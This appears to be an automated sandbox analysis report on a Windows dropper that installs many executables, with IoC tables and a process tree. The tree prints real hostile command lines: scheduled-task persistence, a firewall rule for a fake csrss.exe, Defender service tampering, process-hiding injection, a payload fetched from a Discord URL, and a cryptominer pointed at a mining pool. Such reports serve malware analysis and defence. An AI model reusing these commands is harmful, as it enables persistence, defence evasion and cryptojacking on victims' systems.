1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeWMIC.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exechrome.exeMsBuild.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	3964	powershell.exe
Token: SeIncreaseQuotaPrivilege	1064	WMIC.exe
Token: SeSecurityPrivilege	1064	WMIC.exe
Token: SeTakeOwnershipPrivilege	1064	WMIC.exe
Token: SeLoadDriverPrivilege	1064	WMIC.exe
Token: SeSystemProfilePrivilege	1064	WMIC.exe
Token: SeSystemtimePrivilege	1064	WMIC.exe
Token: SeProfSingleProcessPrivilege	1064	WMIC.exe
Token: SeIncBasePriorityPrivilege	1064	WMIC.exe
Token: SeCreatePagefilePrivilege	1064	WMIC.exe
Token: SeBackupPrivilege	1064	WMIC.exe
Token: SeRestorePrivilege	1064	WMIC.exe
Token: SeShutdownPrivilege	1064	WMIC.exe
Token: SeDebugPrivilege	1064	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1064	WMIC.exe
Token: SeRemoteShutdownPrivilege	1064	WMIC.exe
Token: SeUndockPrivilege	1064	WMIC.exe
Token: SeManageVolumePrivilege	1064	WMIC.exe
Token: 33	1064	WMIC.exe
Token: 34	1064	WMIC.exe
Token: 35	1064	WMIC.exe
Token: 36	1064	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1064	WMIC.exe
Token: SeSecurityPrivilege	1064	WMIC.exe
Token: SeTakeOwnershipPrivilege	1064	WMIC.exe
Token: SeLoadDriverPrivilege	1064	WMIC.exe
Token: SeSystemProfilePrivilege	1064	WMIC.exe
Token: SeSystemtimePrivilege	1064	WMIC.exe
Token: SeProfSingleProcessPrivilege	1064	WMIC.exe
Token: SeIncBasePriorityPrivilege	1064	WMIC.exe
Token: SeCreatePagefilePrivilege	1064	WMIC.exe
Token: SeBackupPrivilege	1064	WMIC.exe
Token: SeRestorePrivilege	1064	WMIC.exe
Token: SeShutdownPrivilege	1064	WMIC.exe
Token: SeDebugPrivilege	1064	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1064	WMIC.exe
Token: SeRemoteShutdownPrivilege	1064	WMIC.exe
Token: SeUndockPrivilege	1064	WMIC.exe
Token: SeManageVolumePrivilege	1064	WMIC.exe
Token: 33	1064	WMIC.exe
Token: 34	1064	WMIC.exe
Token: 35	1064	WMIC.exe
Token: 36	1064	WMIC.exe
Token: SeShutdownPrivilege	5748	powercfg.exe
Token: SeCreatePagefilePrivilege	5748	powercfg.exe
Token: SeShutdownPrivilege	5740	powercfg.exe
Token: SeCreatePagefilePrivilege	5740	powercfg.exe
Token: SeShutdownPrivilege	5732	powercfg.exe
Token: SeCreatePagefilePrivilege	5732	powercfg.exe
Token: SeShutdownPrivilege	5724	powercfg.exe
Token: SeCreatePagefilePrivilege	5724	powercfg.exe
Token: SeShutdownPrivilege	404	chrome.exe
Token: SeCreatePagefilePrivilege	404	chrome.exe
Token: SeShutdownPrivilege	404	chrome.exe
Token: SeCreatePagefilePrivilege	404	chrome.exe
Token: SeDebugPrivilege	4956	MsBuild.exe
Token: SeShutdownPrivilege	404	chrome.exe
Token: SeCreatePagefilePrivilege	404	chrome.exe
Token: SeShutdownPrivilege	404	chrome.exe
Token: SeCreatePagefilePrivilege	404	chrome.exe
Token: SeBackupPrivilege	4956	MsBuild.exe
Token: SeDebugPrivilege	5824	taskkill.exe
Token: SeShutdownPrivilege	404	chrome.exe
Token: SeCreatePagefilePrivilege	404	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exechrome.exechrome.exe

pid	process
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

chrome.exechrome.exechrome.exechrome.exevlc.exe

pid	process
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
5500	vlc.exe
5500	vlc.exe
5500	vlc.exe
5500	vlc.exe
5500	vlc.exe
5500	vlc.exe
5500	vlc.exe
5500	vlc.exe
5500	vlc.exe
5500	vlc.exe
5500	vlc.exe
5500	vlc.exe
5500	vlc.exe
5500	vlc.exe
5500	vlc.exe
5500	vlc.exe

Suspicious use of SetWindowsHookEx 46 IoCs

Processes:

MiniSearchHost.exesetup.exevlc.exePOWERPNT.EXEWINWORD.EXEfirefox.exefirefox.exe

pid	process
2384	MiniSearchHost.exe
1460	setup.exe
5500	vlc.exe
3952	POWERPNT.EXE
3952	POWERPNT.EXE
3952	POWERPNT.EXE
3952	POWERPNT.EXE
3952	POWERPNT.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE
3416	firefox.exe
6452	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

setup.exeQRRkU2L9KM3jIB30lgkiKr7E.exeJDUkgOFuQfv8olOEYHeUtZyb.exeyRKFOkGG5AfemDqdjD0Ia_JB.exeIn28aT6OEzBYJk5VrZkWeJVJ.exe

description	pid	process	target process
PID 1688 wrote to memory of 1080	1688	setup.exe	jr4FrI9_X7jQLPHGvjPB4osL.exe
PID 1688 wrote to memory of 1080	1688	setup.exe	jr4FrI9_X7jQLPHGvjPB4osL.exe
PID 1688 wrote to memory of 1080	1688	setup.exe	jr4FrI9_X7jQLPHGvjPB4osL.exe
PID 1688 wrote to memory of 4752	1688	setup.exe	In28aT6OEzBYJk5VrZkWeJVJ.exe
PID 1688 wrote to memory of 4752	1688	setup.exe	In28aT6OEzBYJk5VrZkWeJVJ.exe
PID 1688 wrote to memory of 4752	1688	setup.exe	In28aT6OEzBYJk5VrZkWeJVJ.exe
PID 1688 wrote to memory of 244	1688	setup.exe	CUHeVRB27PX1VvaDsknUfd39.exe
PID 1688 wrote to memory of 244	1688	setup.exe	CUHeVRB27PX1VvaDsknUfd39.exe
PID 1688 wrote to memory of 244	1688	setup.exe	CUHeVRB27PX1VvaDsknUfd39.exe
PID 1688 wrote to memory of 4012	1688	setup.exe	yRKFOkGG5AfemDqdjD0Ia_JB.exe
PID 1688 wrote to memory of 4012	1688	setup.exe	yRKFOkGG5AfemDqdjD0Ia_JB.exe
PID 1688 wrote to memory of 4012	1688	setup.exe	yRKFOkGG5AfemDqdjD0Ia_JB.exe
PID 1688 wrote to memory of 3876	1688	setup.exe	JDUkgOFuQfv8olOEYHeUtZyb.exe
PID 1688 wrote to memory of 3876	1688	setup.exe	JDUkgOFuQfv8olOEYHeUtZyb.exe
PID 1688 wrote to memory of 3876	1688	setup.exe	JDUkgOFuQfv8olOEYHeUtZyb.exe
PID 1688 wrote to memory of 3992	1688	setup.exe	BAbVtn3t4fM1oAMPrrnfkoTm.exe
PID 1688 wrote to memory of 3992	1688	setup.exe	BAbVtn3t4fM1oAMPrrnfkoTm.exe
PID 1688 wrote to memory of 3992	1688	setup.exe	BAbVtn3t4fM1oAMPrrnfkoTm.exe
PID 1688 wrote to memory of 2816	1688	setup.exe	EL0V9jsicQkwu5y5A3tv3gtV.exe
PID 1688 wrote to memory of 2816	1688	setup.exe	EL0V9jsicQkwu5y5A3tv3gtV.exe
PID 1688 wrote to memory of 2816	1688	setup.exe	EL0V9jsicQkwu5y5A3tv3gtV.exe
PID 1688 wrote to memory of 1568	1688	setup.exe	B5DnhFsDXUm0GjlatykVFhd5.exe
PID 1688 wrote to memory of 1568	1688	setup.exe	B5DnhFsDXUm0GjlatykVFhd5.exe
PID 1688 wrote to memory of 1568	1688	setup.exe	B5DnhFsDXUm0GjlatykVFhd5.exe
PID 1688 wrote to memory of 1344	1688	setup.exe	EVRLEFHpACwBC7LNv6ChLne3.exe
PID 1688 wrote to memory of 1344	1688	setup.exe	EVRLEFHpACwBC7LNv6ChLne3.exe
PID 1688 wrote to memory of 1344	1688	setup.exe	EVRLEFHpACwBC7LNv6ChLne3.exe
PID 1688 wrote to memory of 3948	1688	setup.exe	CzvCj0FEbiMieZehO5NAjU6Y.exe
PID 1688 wrote to memory of 3948	1688	setup.exe	CzvCj0FEbiMieZehO5NAjU6Y.exe
PID 1688 wrote to memory of 3948	1688	setup.exe	CzvCj0FEbiMieZehO5NAjU6Y.exe
PID 1688 wrote to memory of 2056	1688	setup.exe	Uo565YYjVS0blKWqp_vGqUmK.exe
PID 1688 wrote to memory of 2056	1688	setup.exe	Uo565YYjVS0blKWqp_vGqUmK.exe
PID 1688 wrote to memory of 2056	1688	setup.exe	Uo565YYjVS0blKWqp_vGqUmK.exe
PID 1688 wrote to memory of 3920	1688	setup.exe	Kv2hzaDcjRGUD1nawK5WxXFL.exe
PID 1688 wrote to memory of 3920	1688	setup.exe	Kv2hzaDcjRGUD1nawK5WxXFL.exe
PID 1688 wrote to memory of 3920	1688	setup.exe	Kv2hzaDcjRGUD1nawK5WxXFL.exe
PID 1688 wrote to memory of 2856	1688	setup.exe	QRRkU2L9KM3jIB30lgkiKr7E.exe
PID 1688 wrote to memory of 2856	1688	setup.exe	QRRkU2L9KM3jIB30lgkiKr7E.exe
PID 1688 wrote to memory of 2856	1688	setup.exe	QRRkU2L9KM3jIB30lgkiKr7E.exe
PID 1688 wrote to memory of 2104	1688	setup.exe	mJkh_vBPKYWlrKhfwjZe_fEy.exe
PID 1688 wrote to memory of 2104	1688	setup.exe	mJkh_vBPKYWlrKhfwjZe_fEy.exe
PID 1688 wrote to memory of 2104	1688	setup.exe	mJkh_vBPKYWlrKhfwjZe_fEy.exe
PID 1688 wrote to memory of 3492	1688	setup.exe	l0GYgdTIEqcOpBSBqDB_SP8p.exe
PID 1688 wrote to memory of 3492	1688	setup.exe	l0GYgdTIEqcOpBSBqDB_SP8p.exe
PID 2856 wrote to memory of 1700	2856	QRRkU2L9KM3jIB30lgkiKr7E.exe	RegAsm.exe
PID 2856 wrote to memory of 1700	2856	QRRkU2L9KM3jIB30lgkiKr7E.exe	RegAsm.exe
PID 2856 wrote to memory of 1700	2856	QRRkU2L9KM3jIB30lgkiKr7E.exe	RegAsm.exe
PID 2856 wrote to memory of 1700	2856	QRRkU2L9KM3jIB30lgkiKr7E.exe	RegAsm.exe
PID 2856 wrote to memory of 1700	2856	QRRkU2L9KM3jIB30lgkiKr7E.exe	RegAsm.exe
PID 2856 wrote to memory of 1700	2856	QRRkU2L9KM3jIB30lgkiKr7E.exe	RegAsm.exe
PID 2856 wrote to memory of 1700	2856	QRRkU2L9KM3jIB30lgkiKr7E.exe	RegAsm.exe
PID 2856 wrote to memory of 1700	2856	QRRkU2L9KM3jIB30lgkiKr7E.exe	RegAsm.exe
PID 2856 wrote to memory of 1700	2856	QRRkU2L9KM3jIB30lgkiKr7E.exe	RegAsm.exe
PID 2856 wrote to memory of 1700	2856	QRRkU2L9KM3jIB30lgkiKr7E.exe	RegAsm.exe
PID 3876 wrote to memory of 3836	3876	JDUkgOFuQfv8olOEYHeUtZyb.exe	RegAsm.exe
PID 3876 wrote to memory of 3836	3876	JDUkgOFuQfv8olOEYHeUtZyb.exe	RegAsm.exe
PID 3876 wrote to memory of 3836	3876	JDUkgOFuQfv8olOEYHeUtZyb.exe	RegAsm.exe
PID 4012 wrote to memory of 4772	4012	yRKFOkGG5AfemDqdjD0Ia_JB.exe	is-AE9EM.tmp
PID 4012 wrote to memory of 4772	4012	yRKFOkGG5AfemDqdjD0Ia_JB.exe	is-AE9EM.tmp
PID 4012 wrote to memory of 4772	4012	yRKFOkGG5AfemDqdjD0Ia_JB.exe	is-AE9EM.tmp
PID 4752 wrote to memory of 2212	4752	In28aT6OEzBYJk5VrZkWeJVJ.exe	RegAsm.exe
PID 4752 wrote to memory of 2212	4752	In28aT6OEzBYJk5VrZkWeJVJ.exe	RegAsm.exe
PID 4752 wrote to memory of 2212	4752	In28aT6OEzBYJk5VrZkWeJVJ.exe	RegAsm.exe
PID 3876 wrote to memory of 1452	3876	JDUkgOFuQfv8olOEYHeUtZyb.exe	RegAsm.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

outlook_office_path 1 IoCs

Processes:

mJkh_vBPKYWlrKhfwjZe_fEy.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	mJkh_vBPKYWlrKhfwjZe_fEy.exe

outlook_win_path 1 IoCs

Processes:

mJkh_vBPKYWlrKhfwjZe_fEy.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	mJkh_vBPKYWlrKhfwjZe_fEy.exe

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
1⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1688

C:\Users\Admin\Documents\SimpleAdobe\jr4FrI9_X7jQLPHGvjPB4osL.exe
C:\Users\Admin\Documents\SimpleAdobe\jr4FrI9_X7jQLPHGvjPB4osL.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1080

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 1036
3⤵
- Program crash
PID:5884

C:\Users\Admin\Documents\SimpleAdobe\Uo565YYjVS0blKWqp_vGqUmK.exe
C:\Users\Admin\Documents\SimpleAdobe\Uo565YYjVS0blKWqp_vGqUmK.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2056

C:\Users\Admin\Documents\SimpleAdobe\CUHeVRB27PX1VvaDsknUfd39.exe
C:\Users\Admin\Documents\SimpleAdobe\CUHeVRB27PX1VvaDsknUfd39.exe
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:244

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c HR" /sc HOURLY /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:5864

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:6000

C:\Users\Admin\AppData\Local\Temp\heidiIBJsbpNoTUnc\v34VMN90gdbiJnmN2N9A.exe
"C:\Users\Admin\AppData\Local\Temp\heidiIBJsbpNoTUnc\v34VMN90gdbiJnmN2N9A.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2180

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:5936

C:\Users\Admin\Documents\SimpleAdobe\In28aT6OEzBYJk5VrZkWeJVJ.exe
C:\Users\Admin\Documents\SimpleAdobe\In28aT6OEzBYJk5VrZkWeJVJ.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4752

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:2212

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:2632

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:2316

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:1204

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4832 -s 1160
4⤵
- Program crash
PID:5604

C:\Users\Admin\Documents\SimpleAdobe\yRKFOkGG5AfemDqdjD0Ia_JB.exe
C:\Users\Admin\Documents\SimpleAdobe\yRKFOkGG5AfemDqdjD0Ia_JB.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4012

C:\Users\Admin\AppData\Local\Temp\is-1BBM8.tmp\is-AE9EM.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1BBM8.tmp\is-AE9EM.tmp" /SL4 $2029E "C:\Users\Admin\Documents\SimpleAdobe\yRKFOkGG5AfemDqdjD0Ia_JB.exe" 4118746 52224
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4772

C:\Users\Admin\AppData\Local\Three Kingsoft Video\threekingsoftvideo.exe
"C:\Users\Admin\AppData\Local\Three Kingsoft Video\threekingsoftvideo.exe" -i
4⤵
- Executes dropped EXE
PID:3292

C:\Users\Admin\AppData\Local\Three Kingsoft Video\threekingsoftvideo.exe
"C:\Users\Admin\AppData\Local\Three Kingsoft Video\threekingsoftvideo.exe" -s
4⤵
- Executes dropped EXE
PID:1824

C:\Users\Admin\Documents\SimpleAdobe\JDUkgOFuQfv8olOEYHeUtZyb.exe
C:\Users\Admin\Documents\SimpleAdobe\JDUkgOFuQfv8olOEYHeUtZyb.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3876

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:3836

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1452

C:\Users\Admin\Documents\SimpleAdobe\BAbVtn3t4fM1oAMPrrnfkoTm.exe
C:\Users\Admin\Documents\SimpleAdobe\BAbVtn3t4fM1oAMPrrnfkoTm.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3992

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:2404

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:3780

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:2124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2124 -s 2124
4⤵
- Program crash
PID:1344

C:\Users\Admin\Documents\SimpleAdobe\B5DnhFsDXUm0GjlatykVFhd5.exe
C:\Users\Admin\Documents\SimpleAdobe\B5DnhFsDXUm0GjlatykVFhd5.exe
2⤵
- Executes dropped EXE
PID:1568

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
3⤵
PID:2800

C:\Users\Admin\Documents\SimpleAdobe\B5DnhFsDXUm0GjlatykVFhd5.exe
"C:\Users\Admin\Documents\SimpleAdobe\B5DnhFsDXUm0GjlatykVFhd5.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:1476

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1052

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
PID:2972

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
- Modifies Windows Firewall
PID:5744

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1996

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5812

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
PID:5784

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5600

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:1696

C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
5⤵
PID:5188

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3472

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5528

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:2152

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:4468

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
5⤵
- Executes dropped EXE
PID:2504

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
6⤵
PID:4756

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
7⤵
- Launches sc.exe
PID:2900

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3448

C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
5⤵
- Executes dropped EXE
PID:1528

C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id 0bff3c47-bd92-4e38-8c6c-70c21929fa34 --tls --nicehash -o showlock.net:443 --rig-id 0bff3c47-bd92-4e38-8c6c-70c21929fa34 --tls --nicehash -o showlock.net:80 --rig-id 0bff3c47-bd92-4e38-8c6c-70c21929fa34 --nicehash --http-port 3433 --http-access-token 0bff3c47-bd92-4e38-8c6c-70c21929fa34 --randomx-wrmsr=-1
6⤵
- Executes dropped EXE
PID:1940

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe -hide 1940
6⤵
- Executes dropped EXE
- Manipulates WinMon driver.
PID:4920

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:764

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4236

C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
5⤵
- Executes dropped EXE
PID:5688

